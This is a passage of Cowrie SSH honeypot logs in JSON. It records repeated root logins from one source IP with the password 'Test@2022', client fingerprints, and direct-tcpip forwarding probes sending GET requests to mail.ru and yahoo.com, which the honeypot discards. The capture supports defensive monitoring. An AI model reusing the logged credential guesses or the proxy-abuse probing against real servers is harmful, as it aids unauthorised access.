mac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:26.784817Z","src_ip":"77.83.207.83","session":"1288ab13e476"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:27.032918Z","src_ip":"77.83.207.83","session":"1288ab13e476"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14650,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:14650","sensor":"my-vps","timestamp":"2025-08-31T03:43:27.084487Z","session":"1288ab13e476"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:27.134436Z","src_ip":"77.83.207.83","session":"1288ab13e476"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":15504,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:15504","sensor":"my-vps","timestamp":"2025-08-31T03:43:27.276478Z","session":"1288ab13e476"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:27.326511Z","src_ip":"77.83.207.83","session":"1288ab13e476"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":32190,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:32190","sensor":"my-vps","timestamp":"2025-08-31T03:43:27.468178Z","session":"1288ab13e476"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:27.518194Z","src_ip":"77.83.207.83","session":"1288ab13e476"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:27.569089Z","src_ip":"77.83.207.83","session":"1288ab13e476"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34604,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd4a3cb0afb9","protocol":"ssh","message":"New connection: 77.83.207.83:34604 (1.2.3.4:22) [session: cd4a3cb0afb9]","sensor":"my-vps","timestamp":"2025-08-31T03:43:27.620422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:27.621605Z","src_ip":"77.83.207.83","session":"cd4a3cb0afb9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:27.673599Z","src_ip":"77.83.207.83","session":"cd4a3cb0afb9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:27.932326Z","src_ip":"77.83.207.83","session":"cd4a3cb0afb9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2365,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:2365","sensor":"my-vps","timestamp":"2025-08-31T03:43:27.985065Z","session":"cd4a3cb0afb9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:28.037191Z","src_ip":"77.83.207.83","session":"cd4a3cb0afb9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24826,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:24826","sensor":"my-vps","timestamp":"2025-08-31T03:43:28.182331Z","session":"cd4a3cb0afb9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:28.234284Z","src_ip":"77.83.207.83","session":"cd4a3cb0afb9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":21924,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:21924","sensor":"my-vps","timestamp":"2025-08-31T03:43:28.382516Z","session":"cd4a3cb0afb9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:28.434594Z","src_ip":"77.83.207.83","session":"cd4a3cb0afb9"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:28.487747Z","src_ip":"77.83.207.83","session":"cd4a3cb0afb9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34666,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6a941f0358c","protocol":"ssh","message":"New connection: 77.83.207.83:34666 (1.2.3.4:22) [session: c6a941f0358c]","sensor":"my-vps","timestamp":"2025-08-31T03:43:28.537596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:28.538587Z","src_ip":"77.83.207.83","session":"c6a941f0358c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:28.589535Z","src_ip":"77.83.207.83","session":"c6a941f0358c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:28.844390Z","src_ip":"77.83.207.83","session":"c6a941f0358c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5978,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:5978","sensor":"my-vps","timestamp":"2025-08-31T03:43:28.897218Z","session":"c6a941f0358c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:28.948341Z","src_ip":"77.83.207.83","session":"c6a941f0358c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":8383,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:8383","sensor":"my-vps","timestamp":"2025-08-31T03:43:29.093401Z","session":"c6a941f0358c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:29.144641Z","src_ip":"77.83.207.83","session":"c6a941f0358c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":30657,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:30657","sensor":"my-vps","timestamp":"2025-08-31T03:43:29.289471Z","session":"c6a941f0358c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:29.340622Z","src_ip":"77.83.207.83","session":"c6a941f0358c"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:29.392509Z","src_ip":"77.83.207.83","session":"c6a941f0358c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34739,"dst_ip":"1.2.3.4","dst_port":22,"session":"720a5ea881c9","protocol":"ssh","message":"New connection: 77.83.207.83:34739 (1.2.3.4:22) [session: 720a5ea881c9]","sensor":"my-vps","timestamp":"2025-08-31T03:43:29.443672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:29.444597Z","src_ip":"77.83.207.83","session":"720a5ea881c9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:29.496751Z","src_ip":"77.83.207.83","session":"720a5ea881c9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:29.757002Z","src_ip":"77.83.207.83","session":"720a5ea881c9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22939,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:22939","sensor":"my-vps","timestamp":"2025-08-31T03:43:29.810030Z","session":"720a5ea881c9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:29.862552Z","src_ip":"77.83.207.83","session":"720a5ea881c9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":21463,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:21463","sensor":"my-vps","timestamp":"2025-08-31T03:43:30.010600Z","session":"720a5ea881c9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:30.062843Z","src_ip":"77.83.207.83","session":"720a5ea881c9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":6740,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:6740","sensor":"my-vps","timestamp":"2025-08-31T03:43:30.210832Z","session":"720a5ea881c9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:30.263187Z","src_ip":"77.83.207.83","session":"720a5ea881c9"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:30.316179Z","src_ip":"77.83.207.83","session":"720a5ea881c9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34821,"dst_ip":"1.2.3.4","dst_port":22,"session":"d04354f116e4","protocol":"ssh","message":"New connection: 77.83.207.83:34821 (1.2.3.4:22) [session: d04354f116e4]","sensor":"my-vps","timestamp":"2025-08-31T03:43:30.365421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:30.375170Z","src_ip":"77.83.207.83","session":"d04354f116e4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:30.415601Z","src_ip":"77.83.207.83","session":"d04354f116e4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:30.664983Z","src_ip":"77.83.207.83","session":"d04354f116e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10917,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10917","sensor":"my-vps","timestamp":"2025-08-31T03:43:30.715693Z","session":"d04354f116e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:30.765878Z","src_ip":"77.83.207.83","session":"d04354f116e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":3905,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:3905","sensor":"my-vps","timestamp":"2025-08-31T03:43:30.908098Z","session":"d04354f116e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:30.957866Z","src_ip":"77.83.207.83","session":"d04354f116e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":26975,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:26975","sensor":"my-vps","timestamp":"2025-08-31T03:43:31.100106Z","session":"d04354f116e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:31.150221Z","src_ip":"77.83.207.83","session":"d04354f116e4"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:31.201820Z","src_ip":"77.83.207.83","session":"d04354f116e4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34911,"dst_ip":"1.2.3.4","dst_port":22,"session":"5193e8e03aa3","protocol":"ssh","message":"New connection: 77.83.207.83:34911 (1.2.3.4:22) [session: 5193e8e03aa3]","sensor":"my-vps","timestamp":"2025-08-31T03:43:31.250398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:31.251333Z","src_ip":"77.83.207.83","session":"5193e8e03aa3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44568,"dst_ip":"1.2.3.4","dst_port":22,"session":"0aa75b5e2d45","protocol":"ssh","message":"New connection: 212.227.235.229:44568 (1.2.3.4:22) [session: 0aa75b5e2d45]","sensor":"my-vps","timestamp":"2025-08-31T03:43:31.259703Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:31.260430Z","src_ip":"212.227.235.229","session":"0aa75b5e2d45"}
